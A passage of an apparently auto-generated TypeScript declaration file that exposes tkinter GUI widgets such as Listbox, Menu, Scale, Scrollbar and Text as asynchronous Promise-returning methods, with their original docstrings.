{\n\t}\n\n\t/**\n\t * Label widget which can display text and bitmaps.\n\t */\n\n\t/**\n\t * Construct a label widget with the parent MASTER.\n\t * \n\t * STANDARD OPTIONS\n\t * \n\t * activebackground, activeforeground, anchor,\n\t * background, bitmap, borderwidth, cursor,\n\t * 
disabledforeground, font, foreground,\n\t * highlightbackground, highlightcolor,\n\t * highlightthickness, image, justify,\n\t * padx, pady, relief, takefocus, text,\n\t * textvariable, underline, wraplength\n\t * \n\t * WIDGET-SPECIFIC OPTIONS\n\t * \n\t * height, state, width\n\t * \n\t * \n\t */\n\tfunction Label(master?, cnf?): Promise<ILabel>\n\tfunction Label$({ master, cnf }: { master?, cnf?}): Promise<ILabel>\n\tinterface ILabel extends IWidget {\n\t}\n\n\t/**\n\t * Listbox widget which can display a list of strings.\n\t */\n\n\t/**\n\t * Construct a listbox widget with the parent MASTER.\n\t * \n\t * Valid resource names: background, bd, bg, borderwidth, cursor,\n\t * exportselection, fg, font, foreground, height, highlightbackground,\n\t * highlightcolor, highlightthickness, relief, selectbackground,\n\t * selectborderwidth, selectforeground, selectmode, setgrid, takefocus,\n\t * width, xscrollcommand, yscrollcommand, listvariable.\n\t */\n\tfunction Listbox(master?, cnf?): Promise<IListbox>\n\tfunction Listbox$({ master, cnf }: { master?, cnf?}): Promise<IListbox>\n\tinterface IListbox extends IWidget, IXView, IYView {\n\n\t\t/**\n\t\t * Activate item identified by INDEX.\n\t\t */\n\t\tactivate(index): Promise<any>\n\t\tactivate$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Return a tuple of X1,Y1,X2,Y2 coordinates for a rectangle\n\t\t * which encloses the item identified by the given index.\n\t\t */\n\t\tbbox(index): Promise<any>\n\t\tbbox$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Return the indices of the currently selected items.\n\t\t */\n\t\tcurselection(): Promise<any>\n\t\tcurselection$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Delete items from FIRST to LAST (included).\n\t\t */\n\t\tdelete(first, last?): Promise<any>\n\t\tdelete$({ first, last }: { first, last?}): Promise<any>\n\n\t\t/**\n\t\t * Get list of items from FIRST to LAST (included).\n\t\t */\n\t\tget(first, last?): Promise<any>\n\t\tget$({ first, last }: { first, last?}): Promise<any>\n\n\t\t/**\n\t\t * Return index of item identified with INDEX.\n\t\t */\n\t\tindex(index): Promise<any>\n\t\tindex$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Insert ELEMENTS at INDEX.\n\t\t */\n\t\tinsert(index): Promise<any>\n\t\tinsert$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Get index of item which is nearest to y coordinate Y.\n\t\t */\n\t\tnearest(y): Promise<any>\n\t\tnearest$({ y }): Promise<any>\n\n\t\t/**\n\t\t * Remember the current X, Y coordinates.\n\t\t */\n\t\tscan_mark(x, y): Promise<any>\n\t\tscan_mark$({ x, y }): Promise<any>\n\n\t\t/**\n\t\t * Adjust the view of the listbox to 10 times the\n\t\t * difference between X and Y and the coordinates given in\n\t\t * scan_mark.\n\t\t */\n\t\tscan_dragto(x, y): Promise<any>\n\t\tscan_dragto$({ x, y }): Promise<any>\n\n\t\t/**\n\t\t * Scroll such that INDEX is visible.\n\t\t */\n\t\tsee(index): Promise<any>\n\t\tsee$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Set the fixed end of the selection to INDEX.\n\t\t */\n\t\tselection_anchor(index): Promise<any>\n\t\tselection_anchor$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Clear the selection from FIRST to LAST (included).\n\t\t */\n\t\tselection_clear(first, last?): Promise<any>\n\t\tselection_clear$({ first, last }: { first, last?}): Promise<any>\n\n\t\t/**\n\t\t * Return True if INDEX is part of the selection.\n\t\t */\n\t\tselection_includes(index): Promise<any>\n\t\tselection_includes$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Set the selection from FIRST to LAST (included) without\n\t\t * changing the currently 
selected elements.\n\t\t */\n\t\tselection_set(first, last?): Promise<any>\n\t\tselection_set$({ first, last }: { first, last?}): Promise<any>\n\n\t\t/**\n\t\t * Return the number of elements in the listbox.\n\t\t */\n\t\tsize(): Promise<any>\n\t\tsize$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the resource value for an ITEM and an OPTION.\n\t\t */\n\t\titemcget(index, option): Promise<any>\n\t\titemcget$({ index, option }): Promise<any>\n\n\t\t/**\n\t\t * Configure resources of an ITEM.\n\t\t * \n\t\t * The values for resources are specified as keyword arguments.\n\t\t * To get an overview about the allowed keyword arguments\n\t\t * call the method without arguments.\n\t\t * Valid resource names: background, bg, foreground, fg,\n\t\t * selectbackground, selectforeground.\n\t\t */\n\t\titemconfigure(index, cnf?): Promise<any>\n\t\titemconfigure$({ index, cnf }: { index, cnf?}): Promise<any>\n\t\tselect_anchor\n\t\tselect_includes\n\t\tselect_set\n\t}\n\n\t/**\n\t * Menu widget which allows displaying menu bars, pull-down menus and pop-up menus.\n\t */\n\n\t/**\n\t * Construct a menu widget with the parent MASTER.\n\t * \n\t * Valid resource names: activebackground, activeborderwidth,\n\t * activeforeground, background, bd, bg, borderwidth, cursor,\n\t * disabledforeground, fg, font, foreground, postcommand, relief,\n\t * selectcolor, takefocus, tearoff, tearoffcommand, title, type.\n\t */\n\tfunction Menu(master?, cnf?): Promise<IMenu>\n\tfunction Menu$({ master, cnf }: { master?, cnf?}): Promise<IMenu>\n\tinterface IMenu extends IWidget {\n\n\t\t/**\n\t\t * Post the menu at position X,Y with entry ENTRY.\n\t\t */\n\t\ttk_popup(x, y, entry?): Promise<any>\n\t\ttk_popup$({ x, y, entry }: { x, y, entry?}): Promise<any>\n\n\t\t/**\n\t\t * Activate entry at INDEX.\n\t\t */\n\t\tactivate(index): Promise<any>\n\t\tactivate$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Internal function.\n\t\t */\n\t\tadd(itemType, cnf?): Promise<any>\n\t\tadd$({ itemType, cnf }: { itemType, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Add hierarchical menu item.\n\t\t */\n\t\tadd_cascade(cnf?): Promise<any>\n\t\tadd_cascade$({ cnf }: { cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Add checkbutton menu item.\n\t\t */\n\t\tadd_checkbutton(cnf?): Promise<any>\n\t\tadd_checkbutton$({ cnf }: { cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Add command menu item.\n\t\t */\n\t\tadd_command(cnf?): Promise<any>\n\t\tadd_command$({ cnf }: { cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Add radio menu item.\n\t\t */\n\t\tadd_radiobutton(cnf?): Promise<any>\n\t\tadd_radiobutton$({ cnf }: { cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Add separator.\n\t\t */\n\t\tadd_separator(cnf?): Promise<any>\n\t\tadd_separator$({ cnf }: { cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Internal function.\n\t\t */\n\t\tinsert(index, itemType, cnf?): Promise<any>\n\t\tinsert$({ index, itemType, cnf }: { index, itemType, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Add hierarchical menu item at INDEX.\n\t\t */\n\t\tinsert_cascade(index, cnf?): Promise<any>\n\t\tinsert_cascade$({ index, cnf }: { index, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Add checkbutton menu item at INDEX.\n\t\t */\n\t\tinsert_checkbutton(index, cnf?): Promise<any>\n\t\tinsert_checkbutton$({ index, cnf }: { index, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Add command menu item at INDEX.\n\t\t */\n\t\tinsert_command(index, cnf?): Promise<any>\n\t\tinsert_command$({ index, cnf }: { index, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Add radio menu item at INDEX.\n\t\t */\n\t\tinsert_radiobutton(index, cnf?): 
Promise<any>\n\t\tinsert_radiobutton$({ index, cnf }: { index, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Add separator at INDEX.\n\t\t */\n\t\tinsert_separator(index, cnf?): Promise<any>\n\t\tinsert_separator$({ index, cnf }: { index, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Delete menu items between INDEX1 and INDEX2 (included).\n\t\t */\n\t\tdelete(index1, index2?): Promise<any>\n\t\tdelete$({ index1, index2 }: { index1, index2?}): Promise<any>\n\n\t\t/**\n\t\t * Return the resource value of a menu item for OPTION at INDEX.\n\t\t */\n\t\tentrycget(index, option): Promise<any>\n\t\tentrycget$({ index, option }): Promise<any>\n\n\t\t/**\n\t\t * Configure a menu item at INDEX.\n\t\t */\n\t\tentryconfigure(index, cnf?): Promise<any>\n\t\tentryconfigure$({ index, cnf }: { index, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Return the index of a menu item identified by INDEX.\n\t\t */\n\t\tindex(index): Promise<any>\n\t\tindex$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Invoke a menu item identified by INDEX and execute\n\t\t * the associated command.\n\t\t */\n\t\tinvoke(index): Promise<any>\n\t\tinvoke$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Display a menu at position X,Y.\n\t\t */\n\t\tpost(x, y): Promise<any>\n\t\tpost$({ x, y }): Promise<any>\n\n\t\t/**\n\t\t * Return the type of the menu item at INDEX.\n\t\t */\n\t\ttype(index): Promise<any>\n\t\ttype$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Unmap a menu.\n\t\t */\n\t\tunpost(): Promise<any>\n\t\tunpost$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the x-position of the leftmost pixel of the menu item\n\t\t * at INDEX.\n\t\t */\n\t\txposition(index): Promise<any>\n\t\txposition$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Return the y-position of the topmost pixel of the menu item at INDEX.\n\t\t */\n\t\typosition(index): Promise<any>\n\t\typosition$({ index }): Promise<any>\n\t\tentryconfig\n\t}\n\n\t/**\n\t * Menubutton widget, obsolete since Tk8.0.\n\t */\n\tfunction Menubutton(master?, cnf?): Promise<IMenubutton>\n\tfunction Menubutton$({ master, cnf }: { master?, cnf?}): Promise<IMenubutton>\n\tinterface IMenubutton extends IWidget {\n\t}\n\n\t/**\n\t * Message widget to display multiline text. 
Obsolete since Label does it too.\n\t */\n\tfunction Message(master?, cnf?): Promise<IMessage>\n\tfunction Message$({ master, cnf }: { master?, cnf?}): Promise<IMessage>\n\tinterface IMessage extends IWidget {\n\t}\n\n\t/**\n\t * Radiobutton widget which shows only one of several buttons in on-state.\n\t */\n\n\t/**\n\t * Construct a radiobutton widget with the parent MASTER.\n\t * \n\t * Valid resource names: activebackground, activeforeground, anchor,\n\t * background, bd, bg, bitmap, borderwidth, command, cursor,\n\t * disabledforeground, fg, font, foreground, height,\n\t * highlightbackground, highlightcolor, highlightthickness, image,\n\t * indicatoron, justify, padx, pady, relief, selectcolor, selectimage,\n\t * state, takefocus, text, textvariable, underline, value, variable,\n\t * width, wraplength.\n\t */\n\tfunction Radiobutton(master?, cnf?): Promise<IRadiobutton>\n\tfunction Radiobutton$({ master, cnf }: { master?, cnf?}): Promise<IRadiobutton>\n\tinterface IRadiobutton extends IWidget {\n\n\t\t/**\n\t\t * Put the button in off-state.\n\t\t */\n\t\tdeselect(): Promise<any>\n\t\tdeselect$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Flash the button.\n\t\t */\n\t\tflash(): Promise<any>\n\t\tflash$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Toggle the button and invoke a command if given as resource.\n\t\t */\n\t\tinvoke(): Promise<any>\n\t\tinvoke$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Put the button in on-state.\n\t\t */\n\t\tselect(): Promise<any>\n\t\tselect$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Scale widget which can display a numerical scale.\n\t */\n\n\t/**\n\t * Construct a scale widget with the parent MASTER.\n\t * \n\t * Valid resource names: activebackground, background, bigincrement, bd,\n\t * bg, borderwidth, command, cursor, digits, fg, font, foreground, from,\n\t * highlightbackground, highlightcolor, highlightthickness, label,\n\t * length, orient, relief, repeatdelay, repeatinterval, resolution,\n\t * showvalue, sliderlength, sliderrelief, state, takefocus,\n\t * tickinterval, to, troughcolor, variable, width.\n\t */\n\tfunction Scale(master?, cnf?): Promise<IScale>\n\tfunction Scale$({ master, cnf }: { master?, cnf?}): Promise<IScale>\n\tinterface IScale extends IWidget {\n\n\t\t/**\n\t\t * Get the current value as integer or float.\n\t\t */\n\t\tget(): Promise<any>\n\t\tget$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set the value to VALUE.\n\t\t */\n\t\tset(value): Promise<any>\n\t\tset$({ value }): Promise<any>\n\n\t\t/**\n\t\t * Return a tuple (X,Y) of the point along the centerline of the\n\t\t * trough that corresponds to VALUE or the current value if None is\n\t\t * given.\n\t\t */\n\t\tcoords(value?): Promise<any>\n\t\tcoords$({ value }: { value?}): Promise<any>\n\n\t\t/**\n\t\t * Return where the point X,Y lies. 
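For example (hypothetical):\n\t\t * const part = await scale.identify(10, 5), where 'scale' is an assumed\n\t\t * Scale instance. 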
Valid return values are \"slider\",\n\t\t * \"trough1\" and \"trough2\".\n\t\t */\n\t\tidentify(x, y): Promise<any>\n\t\tidentify$({ x, y }): Promise<any>\n\t}\n\n\t/**\n\t * Scrollbar widget which displays a slider at a certain position.\n\t */\n\n\t/**\n\t * Construct a scrollbar widget with the parent MASTER.\n\t * \n\t * Valid resource names: activebackground, activerelief,\n\t * background, bd, bg, borderwidth, command, cursor,\n\t * elementborderwidth, highlightbackground,\n\t * highlightcolor, highlightthickness, jump, orient,\n\t * relief, repeatdelay, repeatinterval, takefocus,\n\t * troughcolor, width.\n\t */\n\tfunction Scrollbar(master?, cnf?): Promise<IScrollbar>\n\tfunction Scrollbar$({ master, cnf }: { master?, cnf?}): Promise<IScrollbar>\n\tinterface IScrollbar extends IWidget {\n\n\t\t/**\n\t\t * Marks the element indicated by index as active.\n\t\t * The only index values understood by this method are \"arrow1\",\n\t\t * \"slider\", or \"arrow2\". If any other value is specified then no\n\t\t * element of the scrollbar will be active. If index is not specified,\n\t\t * the method returns the name of the element that is currently active,\n\t\t * or None if no element is active.\n\t\t */\n\t\tactivate(index?): Promise<any>\n\t\tactivate$({ index }: { index?}): Promise<any>\n\n\t\t/**\n\t\t * Return the fractional change of the scrollbar setting if it\n\t\t * would be moved by DELTAX or DELTAY pixels.\n\t\t */\n\t\tdelta(deltax, deltay): Promise<any>\n\t\tdelta$({ deltax, deltay }): Promise<any>\n\n\t\t/**\n\t\t * Return the fractional value which corresponds to a slider\n\t\t * position of X,Y.\n\t\t */\n\t\tfraction(x, y): Promise<any>\n\t\tfraction$({ x, y }): Promise<any>\n\n\t\t/**\n\t\t * Return the element under position X,Y as one of\n\t\t * \"arrow1\",\"slider\",\"arrow2\" or \"\".\n\t\t */\n\t\tidentify(x, y): Promise<any>\n\t\tidentify$({ x, y }): Promise<any>\n\n\t\t/**\n\t\t * Return the current fractional values (upper and lower end)\n\t\t * of the slider position.\n\t\t */\n\t\tget(): Promise<any>\n\t\tget$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set the fractional values of the slider position (upper and\n\t\t * lower ends as value between 0 and 1).\n\t\t */\n\t\tset(first, last): Promise<any>\n\t\tset$({ first, last }): Promise<any>\n\t}\n\n\t/**\n\t * Text widget which can display text in various forms.\n\t */\n\n\t/**\n\t * Construct a text widget with the parent MASTER.\n\t * \n\t * STANDARD OPTIONS\n\t * \n\t * background, borderwidth, cursor,\n\t * exportselection, font, foreground,\n\t * highlightbackground, highlightcolor,\n\t * highlightthickness, insertbackground,\n\t * insertborderwidth, insertofftime,\n\t * insertontime, insertwidth, padx, pady,\n\t * relief, selectbackground,\n\t * selectborderwidth, selectforeground,\n\t * setgrid, takefocus,\n\t * xscrollcommand, yscrollcommand,\n\t * \n\t * WIDGET-SPECIFIC OPTIONS\n\t * \n\t * autoseparators, height, maxundo,\n\t * spacing1, spacing2, spacing3,\n\t * state, tabs, undo, width, wrap,\n\t * \n\t * \n\t */\n\tfunction Text(master?, cnf?): Promise<IText>\n\tfunction Text$({ master, cnf }: { master?, cnf?}): Promise<IText>\n\tinterface IText extends IWidget, IXView, IYView {\n\n\t\t/**\n\t\t * Return a tuple of (x,y,width,height) which gives the bounding\n\t\t * box of the visible part of the character at the given index.\n\t\t */\n\t\tbbox(index): Promise<any>\n\t\tbbox$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Return whether between index INDEX1 and index INDEX2 the\n\t\t * relation OP is 
satisfied. OP is one of <, <=, ==, >=, >, or !=.\n\t\t */\n\t\tcompare(index1, op, index2): Promise<any>\n\t\tcompare$({ index1, op, index2 }): Promise<any>\n\n\t\t/**\n\t\t * Counts the number of relevant things between the two indices.\n\t\t * If index1 is after index2, the result will be a negative number\n\t\t * (and this holds for each of the possible options).\n\t\t * \n\t\t * The actual items which are counted depend on the options given by\n\t\t * args. The result is a list of integers, one for the result of each\n\t\t * counting option given. Valid counting options are \"chars\",\n\t\t * \"displaychars\", \"displayindices\", \"displaylines\", \"indices\",\n\t\t * \"lines\", \"xpixels\" and \"ypixels\". There is an additional possible\n\t\t * option \"update\", which, if given, makes all subsequent options ensure\n\t\t * that any possible out of date information is recalculated.\n\t\t */\n\t\tcount(index1, index2): Promise<any>\n\t\tcount$({ index1, index2 }): Promise<any>\n\n\t\t/**\n\t\t * Turn on the internal consistency checks of the B-Tree inside the text\n\t\t * widget according to BOOLEAN.\n\t\t */\n\t\tdebug(boolean?): Promise<any>\n\t\tdebug$({ boolean }: { boolean?}): Promise<any>\n\n\t\t/**\n\t\t * Delete the characters between INDEX1 and INDEX2 (not included).\n\t\t */\n\t\tdelete(index1, index2?): Promise<any>\n\t\tdelete$({ index1, index2 }: { index1, index2?}): Promise<any>\n\n\t\t/**\n\t\t * Return tuple (x,y,width,height,baseline) giving the bounding box\n\t\t * and baseline position of the visible part of the line containing\n\t\t * the character at INDEX.\n\t\t */\n\t\tdlineinfo(index): Promise<any>\n\t\tdlineinfo$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Return the contents of the widget between index1 and index2.\n\t\t * \n\t\t * The type of contents returned is filtered based on the keyword\n\t\t * parameters; if 'all', 'image', 'mark', 'tag', 'text', or 'window' are\n\t\t * given and true, then the corresponding items are returned. The result\n\t\t * is a list of triples of the form (key, value, index). If none of the\n\t\t * keywords are true then 'all' is used by default.\n\t\t * \n\t\t * If the 'command' argument is given, it is called once for each element\n\t\t * of the list of triples, with the values of each triple serving as the\n\t\t * arguments to the function. In this case the list is not returned.\n\t\t */\n\t\tdump(index1, index2?, command?): Promise<any>\n\t\tdump$({ index1, index2, command }: { index1, index2?, command?}): Promise<any>\n\n\t\t/**\n\t\t * Internal method\n\t\t * \n\t\t * This method controls the undo mechanism and\n\t\t * the modified flag. The exact behavior of the\n\t\t * command depends on the option argument that\n\t\t * follows the edit argument. The following forms\n\t\t * of the command are currently supported:\n\t\t * \n\t\t * edit_modified, edit_redo, edit_reset, edit_separator\n\t\t * and edit_undo\n\t\t * \n\t\t * \n\t\t */\n\t\tedit(): Promise<any>\n\t\tedit$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Get or Set the modified flag\n\t\t * \n\t\t * If arg is not specified, returns the modified\n\t\t * flag of the widget. The insert, delete, edit undo and\n\t\t * edit redo commands or the user can set or clear the\n\t\t * modified flag. 
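For example (a hypothetical sketch; `txt` is assumed\n\t\t * to be an IText instance obtained from this bridge):\n\t\t * \n\t\t *     const dirty = await txt.edit_modified()   // query the flag\n\t\t *     await txt.edit_modified(false)            // clear it\n\t\t * \n\t\t * 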
If boolean is specified, sets the\n\t\t * modified flag of the widget to arg.\n\t\t * \n\t\t */\n\t\tedit_modified(arg?): Promise<any>\n\t\tedit_modified$({ arg }: { arg?}): Promise<any>\n\n\t\t/**\n\t\t * Redo the last undone edit\n\t\t * \n\t\t * When the undo option is true, reapplies the last\n\t\t * undone edits provided no other edits were done since\n\t\t * then. Generates an error when the redo stack is empty.\n\t\t * Does nothing when the undo option is false.\n\t\t * \n\t\t */\n\t\tedit_redo(): Promise<any>\n\t\tedit_redo$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Clears the undo and redo stacks\n\t\t * \n\t\t */\n\t\tedit_reset(): Promise<any>\n\t\tedit_reset$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Inserts a separator (boundary) on the undo stack.\n\t\t * \n\t\t * Does nothing when the undo option is false\n\t\t * \n\t\t */\n\t\tedit_separator(): Promise<any>\n\t\tedit_separator$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Undoes the last edit action\n\t\t * \n\t\t * If the undo option is true. An edit action is defined\n\t\t * as all the insert and delete commands that are recorded\n\t\t * on the undo stack in between two separators. Generates\n\t\t * an error when the undo stack is empty. Does nothing\n\t\t * when the undo option is false\n\t\t * \n\t\t */\n\t\tedit_undo(): Promise<any>\n\t\tedit_undo$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the text from INDEX1 to INDEX2 (not included).\n\t\t */\n\t\tget(index1, index2?): Promise<any>\n\t\tget$({ index1, index2 }: { index1, index2?}): Promise<any>\n\n\t\t/**\n\t\t * Return the value of OPTION of an embedded image at INDEX.\n\t\t */\n\t\timage_cget(index, option): Promise<any>\n\t\timage_cget$({ index, option }): Promise<any>\n\n\t\t/**\n\t\t * Configure an embedded image at INDEX.\n\t\t */\n\t\timage_configure(index, cnf?): Promise<any>\n\t\timage_configure$({ index, cnf }: { index, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Create an embedded image at INDEX.\n\t\t */\n\t\timage_create(index, cnf?): Promise<any>\n\t\timage_create$({ index, cnf }: { index, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Return all names of embedded images in this widget.\n\t\t */\n\t\timage_names(): Promise<any>\n\t\timage_names$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the index in the form line.char for INDEX.\n\t\t */\n\t\tindex(index): Promise<any>\n\t\tindex$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Insert CHARS before the characters at INDEX. An additional\n\t\t * tag can be given in ARGS. 
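For example\n\t\t * (hypothetical usage; `txt` is an assumed IText instance):\n\t\t * \n\t\t *     await txt.insert('end', 'hello', 'greeting')   // chars plus one tag\n\t\t * \n\t\t * 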
Additional CHARS and tags can follow in ARGS.\n\t\t */\n\t\tinsert(index, chars): Promise<any>\n\t\tinsert$({ index, chars }): Promise<any>\n\n\t\t/**\n\t\t * Change the gravity of a mark MARKNAME to DIRECTION (LEFT or RIGHT).\n\t\t * Return the current value if None is given for DIRECTION.\n\t\t */\n\t\tmark_gravity(markName, direction?): Promise<any>\n\t\tmark_gravity$({ markName, direction }: { markName, direction?}): Promise<any>\n\n\t\t/**\n\t\t * Return all mark names.\n\t\t */\n\t\tmark_names(): Promise<any>\n\t\tmark_names$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set mark MARKNAME before the character at INDEX.\n\t\t */\n\t\tmark_set(markName, index): Promise<any>\n\t\tmark_set$({ markName, index }): Promise<any>\n\n\t\t/**\n\t\t * Delete all marks in MARKNAMES.\n\t\t */\n\t\tmark_unset(): Promise<any>\n\t\tmark_unset$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the name of the next mark after INDEX.\n\t\t */\n\t\tmark_next(index): Promise<any>\n\t\tmark_next$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Return the name of the previous mark before INDEX.\n\t\t */\n\t\tmark_previous(index): Promise<any>\n\t\tmark_previous$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Creates a peer text widget with the given newPathName, and any\n\t\t * optional standard configuration options. By default the peer will\n\t\t * have the same start and end line as the parent widget, but\n\t\t * these can be overridden with the standard configuration options.\n\t\t */\n\t\tpeer_create(newPathName, cnf?): Promise<any>\n\t\tpeer_create$({ newPathName, cnf }: { newPathName, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Returns a list of peers of this widget (this does not include\n\t\t * the widget itself).\n\t\t */\n\t\tpeer_names(): Promise<any>\n\t\tpeer_names$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Replaces the range of characters between index1 and index2 with\n\t\t * the given characters and tags specified by args.\n\t\t * \n\t\t * See the method insert for some more information about args, and the\n\t\t * method delete for information about the indices.\n\t\t */\n\t\treplace(index1, index2, chars): Promise<any>\n\t\treplace$({ index1, index2, chars }): Promise<any>\n\n\t\t/**\n\t\t * Remember the current X, Y coordinates.\n\t\t */\n\t\tscan_mark(x, y): Promise<any>\n\t\tscan_mark$({ x, y }): Promise<any>\n\n\t\t/**\n\t\t * Adjust the view of the text to 10 times the\n\t\t * difference between X and Y and the coordinates given in\n\t\t * scan_mark.\n\t\t */\n\t\tscan_dragto(x, y): Promise<any>\n\t\tscan_dragto$({ x, y }): Promise<any>\n\n\t\t/**\n\t\t * Search PATTERN beginning from INDEX until STOPINDEX.\n\t\t * Return the index of the first character of a match or an\n\t\t * empty string.\n\t\t */\n\t\tsearch(pattern, index, stopindex?, forwards?, backwards?, exact?, regexp?, nocase?, count?, elide?): Promise<any>\n\t\tsearch$({ pattern, index, stopindex, forwards, backwards, exact, regexp, nocase, count, elide }: { pattern, index, stopindex?, forwards?, backwards?, exact?, regexp?, nocase?, count?, elide?}): Promise<any>\n\n\t\t/**\n\t\t * Scroll such that the character at INDEX is visible.\n\t\t */\n\t\tsee(index): Promise<any>\n\t\tsee$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Add tag TAGNAME to all characters between INDEX1 and index2 in ARGS.\n\t\t * Additional pairs of indices may follow in ARGS.\n\t\t */\n\t\ttag_add(tagName, index1): Promise<any>\n\t\ttag_add$({ tagName, index1 }): Promise<any>\n\n\t\t/**\n\t\t * Unbind for all characters with TAGNAME for event SEQUENCE the\n\t\t * function 
identified with FUNCID.\n\t\t */\n\t\ttag_unbind(tagName, sequence, funcid?): Promise<any>\n\t\ttag_unbind$({ tagName, sequence, funcid }: { tagName, sequence, funcid?}): Promise<any>\n\n\t\t/**\n\t\t * Bind to all characters with TAGNAME at event SEQUENCE a call to function FUNC.\n\t\t * \n\t\t * An additional boolean parameter ADD specifies whether FUNC will be\n\t\t * called additionally to the other bound function or whether it will\n\t\t * replace the previous function. See bind for the return value.\n\t\t */\n\t\ttag_bind(tagName, sequence, func, add?): Promise<any>\n\t\ttag_bind$({ tagName, sequence, func, add }: { tagName, sequence, func, add?}): Promise<any>\n\n\t\t/**\n\t\t * Return the value of OPTION for tag TAGNAME.\n\t\t */\n\t\ttag_cget(tagName, option): Promise<any>\n\t\ttag_cget$({ tagName, option }): Promise<any>\n\n\t\t/**\n\t\t * Configure a tag TAGNAME.\n\t\t */\n\t\ttag_configure(tagName, cnf?): Promise<any>\n\t\ttag_configure$({ tagName, cnf }: { tagName, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Delete all tags in TAGNAMES.\n\t\t */\n\t\ttag_delete(): Promise<any>\n\t\ttag_delete$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Change the priority of tag TAGNAME such that it is lower\n\t\t * than the priority of BELOWTHIS.\n\t\t */\n\t\ttag_lower(tagName, belowThis?): Promise<any>\n\t\ttag_lower$({ tagName, belowThis }: { tagName, belowThis?}): Promise<any>\n\n\t\t/**\n\t\t * Return a list of all tag names.\n\t\t */\n\t\ttag_names(index?): Promise<any>\n\t\ttag_names$({ index }: { index?}): Promise<any>\n\n\t\t/**\n\t\t * Return a list of start and end index for the first sequence of\n\t\t * characters between INDEX1 and INDEX2 which all have tag TAGNAME.\n\t\t * The text is searched forward from INDEX1.\n\t\t */\n\t\ttag_nextrange(tagName, index1, index2?): Promise<any>\n\t\ttag_nextrange$({ tagName, index1, index2 }: { tagName, index1, index2?}): Promise<any>\n\n\t\t/**\n\t\t * Return a list of start and end index for the first sequence of\n\t\t * characters between INDEX1 and INDEX2 which all have tag TAGNAME.\n\t\t * The text is searched backwards from INDEX1.\n\t\t */\n\t\ttag_prevrange(tagName, index1, index2?): Promise<any>\n\t\ttag_prevrange$({ tagName, index1, index2 }: { tagName, index1, index2?}): Promise<any>\n\n\t\t/**\n\t\t * Change the priority of tag TAGNAME such that it is higher\n\t\t * than the priority of ABOVETHIS.\n\t\t */\n\t\ttag_raise(tagName, aboveThis?): Promise<any>\n\t\ttag_raise$({ tagName, aboveThis }: { tagName, aboveThis?}): Promise<any>\n\n\t\t/**\n\t\t * Return a list of ranges of text which have tag TAGNAME.\n\t\t */\n\t\ttag_ranges(tagName): Promise<any>\n\t\ttag_ranges$({ tagName }): Promise<any>\n\n\t\t/**\n\t\t * Remove tag TAGNAME from all characters between INDEX1 and INDEX2.\n\t\t */\n\t\ttag_remove(tagName, index1, index2?): Promise<any>\n\t\ttag_remove$({ tagName, index1, index2 }: { tagName, index1, index2?}): Promise<any>\n\n\t\t/**\n\t\t * Return the value of OPTION of an embedded window at INDEX.\n\t\t */\n\t\twindow_cget(index, option): Promise<any>\n\t\twindow_cget$({ index, option }): Promise<any>\n\n\t\t/**\n\t\t * Configure an embedded window at INDEX.\n\t\t */\n\t\twindow_configure(index, cnf?): Promise<any>\n\t\twindow_configure$({ index, cnf }: { index, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Create a window at INDEX.\n\t\t */\n\t\twindow_create(index, cnf?): Promise<any>\n\t\twindow_create$({ index, cnf }: { index, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Return all names of embedded windows in this widget.\n\t\t 
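* \n\t\t * For example (a hypothetical sketch; `txt` is an assumed IText\n\t\t * instance):\n\t\t * \n\t\t *     const names = await txt.window_names()\n\t\t 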
